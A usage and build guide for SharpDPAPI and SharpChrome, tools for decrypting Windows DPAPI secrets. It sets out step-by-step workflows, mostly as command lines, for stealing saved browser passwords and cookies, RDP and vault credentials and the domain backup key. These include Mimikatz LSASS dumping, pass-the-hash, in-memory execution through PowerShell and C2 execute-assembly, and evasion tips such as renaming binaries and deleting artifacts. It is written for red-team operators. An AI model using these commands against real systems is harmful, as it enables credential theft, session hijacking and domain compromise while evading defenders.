Build Requirements
Visual Studio Visual Studio 2019 Community Edition or later
.NET Framework .NET Framework 3.5 (default) or .NET 4.0/4.5
Git For cloning the repository
Windows OS Windows build environment required
Compilation Steps
Clone Repository
git clone https://github.com/GhostPack/SharpDPAPI cd SharpDPAPI
Open Solution
Open SharpDPAPI.sln in Visual Studio 2019 or later
Select Build Configuration
Choose Release configuration (not Debug)
Target platform: Any CPU
Build Projects
Build → Build Solution (or press Ctrl+Shift+B)
Both SharpDPAPI.exe and SharpChrome.exe will be compiled
Locate Binaries
Compiled binaries will be in: SharpDPAPI/SharpDPAPI/bin/Release/SharpDPAPI.exe SharpDPAPI/SharpChrome/bin/Release/SharpChrome.exe
Targeting Different .NET Versions SharpDPAPI defaults to .NET Framework 3.5 for maximum compatibility. However, you can retarget to newer versions:
.NET 3.5 (Default)
.NET 4.0 / 4.5
Advantages:
Maximum compatibility
Runs on most Windows systems by default
Preferred for operational use
Disadvantages:
May not be installed on newer systems
Requires installation if not present
No changes needed - this is the default configuration.Advantages:
More commonly installed on modern systems
Better performance
More features available
Disadvantages:
May not be available on older systems
Slightly larger binary size
To retarget:
Right-click the project in Solution Explorer
Select Properties
Go to Application tab
Change Target framework to .NET 4.0 or 4.5
Rebuild the solution
If you change the target framework, ensure the target system has the appropriate .NET version installed.
Binary Distribution SpecterOps does not provide pre-compiled binaries for SharpDPAPI or SharpChrome. You must compile from source.
Why no binaries?
Encourages understanding of the code
Prevents signature-based detection
Allows for customization
Avoids potential legal issues
Running SharpDPAPI Direct Execution
PowerShell Wrapper
PSRemoting
Execute-Assembly
# Basic execution SharpDPAPI.exe # Show command help SharpDPAPI.exe --help # Execute specific command SharpDPAPI.exe triage /pvk:key.pvk
You can load and execute SharpDPAPI in memory via PowerShell: # Base64 encode the binary [ Convert ]::ToBase64String([ IO.File ]::ReadAllBytes( "C:\Path\SharpDPAPI.exe" )) | Out-File - Encoding ASCII SharpDPAPI.txt # Load in PowerShell $SharpDPAPIAssembly = [ System.Reflection.Assembly ]::Load([ Convert ]::FromBase64String( "AA..." )) # Execute command [ SharpDPAPI.Program ]::Main( "triage /pvk:key.pvk" )
For running over PSRemoting (which doesn’t handle stdout well): # Use MainString() method instead of Main() [ SharpDPAPI.Program ]::MainString( "machinetriage" )
Or redirect output to file: SharpDPAPI.exe triage /consoleoutfile:C: \o utput.txt /pvk:key.pvk
Execute via Cobalt Strike or other frameworks: execute-assembly /path/to/SharpDPAPI.exe triage /pvk:key.pvk
Command Line Syntax SharpDPAPI SharpDPAPI.exe < comman d > [arguments]
Available Commands:
backupkey - Retrieve domain DPAPI backup keymasterkeys - Decrypt user masterkeyscredentials - Decrypt Credential Manager credentialsvaults - Decrypt Windows Vault datardg - Decrypt RDP connection passwordskeepass - Extract KeePass master keyscertificates - Decrypt certificate private keystriage - Run all user commandsps - Decrypt PowerShell credential XMLblob - Decrypt arbitrary DPAPI blobsearch - Search for DPAPI blobssccm - Extract SCCM credentialsmachinemasterkeys - Decrypt machine masterkeysmachinecredentials - Decrypt system credentialsmachinevaults - Decrypt system vaultsmachinetriage - Run all machine commands
SharpChrome SharpChrome.exe < comman d > [arguments]
Available Commands:
logins - Extract and decrypt saved passwordscookies - Extract and decrypt cookiesstatekeys - Extract AES state keysbackupkey - Retrieve domain DPAPI backup key
Quick Start Examples
Local User Triage (No Privileges)
# Decrypt current user's RDP passwords SharpDPAPI.exe rdg /unprotect # Extract current user's Chrome passwords SharpChrome.exe logins # Extract current user's Chrome cookies SharpChrome.exe cookies /url:".*company\.com.*"
# Triage all machine DPAPI data SharpDPAPI.exe machinetriage # Use Mimikatz to get masterkeys # mimikatz# sekurlsa::dpapi # Triage user data with masterkeys SharpDPAPI.exe triage {GUID1}:SHA1 {GUID2}:SHA1 SharpChrome.exe logins {GUID1}:SHA1 {GUID2}:SHA1
# 1. Get domain backup key SharpDPAPI.exe backupkey /file:key.pvk # 2. Triage local system SharpDPAPI.exe triage /pvk:key.pvk SharpChrome.exe logins /pvk:key.pvk SharpChrome.exe cookies /pvk:key.pvk # 3. Triage remote systems SharpDPAPI.exe credentials /pvk:key.pvk /server:workstation.domain.com SharpChrome.exe logins /pvk:key.pvk /server:workstation.domain.com
# Copy DPAPI data from target to analysis machine # Decrypt with known password SharpDPAPI.exe credentials /target:C: \E vidence \C redentials /password:Password123! # Decrypt Chrome data with backup key SharpChrome.exe logins /target:"C:\Evidence\Login Data" /pvk:key.pvk
Common Workflows Workflow 1: Domain Compromise # Step 1: Retrieve domain backup key (requires DA) SharpDPAPI.exe backupkey /server:dc.domain.com /file:backup.pvk # Step 2: Triage all users on current system SharpDPAPI.exe triage /pvk:backup.pvk SharpChrome.exe logins /pvk:backup.pvk SharpChrome.exe cookies /pvk:backup.pvk /url:".*aws.*" /format:json # Step 3: Remote system enumeration SharpDPAPI.exe credentials /pvk:backup.pvk /server:workstation1.domain.com SharpDPAPI.exe credentials /pvk:backup.pvk /server:workstation2.domain.com SharpChrome.exe logins /pvk:backup.pvk /server:workstation1.domain.com
Workflow 2: Local System Compromise # Step 1: Extract masterkeys from LSASS with Mimikatz # mimikatz# privilege::debug # mimikatz# sekurlsa::dpapi # Step 2: Save masterkeys to file (format: {GUID}:SHA1 per line) # {8abc35b1-b718-4a86-9781-7fd7f37101dd}:ae349cdd3a230f5e04f70fd02be69e2e71f1b017 # {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd00efd903a9b61c42e6c9ab0f4 # Step 3: Triage with masterkey file SharpDPAPI.exe triage /mkfile:masterkeys.txt SharpChrome.exe logins /mkfile:masterkeys.txt # Step 4: Machine triage (requires elevation) SharpDPAPI.exe machinetriage
Workflow 3: Credential-Based Access # If you have a user's password SharpDPAPI.exe credentials /password:SecurePassword123 SharpDPAPI.exe vaults /password:SecurePassword123 SharpChrome.exe logins /password:SecurePassword123 # If you have NTLM hash SharpDPAPI.exe credentials /ntlm:8846F7EAEE8FB117AD06BDD830B7586C SharpChrome.exe cookies /ntlm:8846F7EAEE8FB117AD06BDD830B7586C
Output Management Console Output
File Output
Formatted Output
Default behavior - prints to console: SharpDPAPI.exe credentials /pvk:key.pvk
Good for: Interactive use, immediate feedback Redirect all output to file: SharpDPAPI.exe credentials /pvk:key.pvk /consoleoutfile:C: \r esults.txt SharpChrome.exe cookies /pvk:key.pvk /consoleoutfile:C: \c ookies.txt
Good for: PSRemoting, logging, exfiltration Choose output format (SharpChrome): # CSV format (default) SharpChrome.exe logins /format:csv # Table format SharpChrome.exe logins /format:table # JSON format (cookies only) SharpChrome.exe cookies /format:json /setneverexpire
Good for: Data processing, cookie hijacking Troubleshooting
Problem: Solution won’t buildSolutions:
Ensure Visual Studio 2019+ is installed
Verify .NET Framework 3.5 is installed
Clean solution (Build → Clean Solution)
Rebuild solution (Build → Rebuild Solution)
Check for missing NuGet packages
Problem: Target system doesn’t have .NET FrameworkSolutions:
Install .NET Framework 3.5:
# Windows 10/11 DISM / Online / Enable-Feature / FeatureName:NetFx3 / All # Or via PowerShell Enable-WindowsOptionalFeature - Online - FeatureName NetFx3 - All
Or recompile for .NET 4.0/4.5
Problem: Commands run but no data is decryptedSolutions:
Verify decryption method is correct:
Using /unprotect? Must run as target user
Using /pvk? Must have valid backup key
Using masterkeys? Must have correct GUIDs
Using /password? Must be correct password
Check if DPAPI data exists:
Credentials: %LOCALAPPDATA%\Microsoft\Credentials\
Vaults: %LOCALAPPDATA%\Microsoft\Vault\
Chrome: %LOCALAPPDATA%\Google\Chrome\User Data\Default\
Problem: Access denied when reading filesSolutions:
For user DPAPI: Run as target user or use valid decryption method
For machine DPAPI: Must run as Administrator
For remote systems: Must have admin access to target
For domain backup key: Must have Domain Admin privileges
Chrome 80+ Not Decrypting
Problem: Chrome logins/cookies won’t decryptSolutions:
First decrypt the state key:
SharpChrome.exe statekeys /pvk:key.pvk
Then use the state key:
SharpChrome.exe logins /statekey:EXTRACTED_KEY
Or use automatic decryption:
SharpChrome.exe logins /pvk:key.pvk
Operational Security Consider these OPSEC factors when using SharpDPAPI/SharpChrome in operations:
Detection Vectors
Mitigation Strategies
Alternative Execution
File reads of sensitive DPAPI locations
LSASS access for DPAPI_SYSTEM secret
Process execution of SharpDPAPI.exe/SharpChrome.exe
Network SMB access to remote systems
Domain controller backup key retrieval
Bulk credential file access
Rename binaries to blend in
Execute from memory via PowerShell
Use execute-assembly in C2 frameworks
Limit scope to specific targets
Delete artifacts after use
Redirect output to file to minimize console artifacts
Use /consoleoutfile for cleaner operations
Load as .NET assembly in memory
Use Donut/pe_to_shellcode for shellcode conversion
Execute via C2 framework execute-assembly
Reflective DLL injection
PowerShell wrapper scripts
Additional Resources
GitHub Repository Source code and latest releases
DPAPI Attack Guide Operational guidance for DPAPI abuse
Mimikatz Wiki Understanding Credential Manager and DPAPI
Visual Studio Community Download Visual Studio for compilation
Next Steps
SharpDPAPI Overview Learn about DPAPI and SharpDPAPI capabilities
SharpChrome Overview Browser credential extraction guide
Command Reference Detailed command documentation
Example Scenarios Real-world usage scenarios
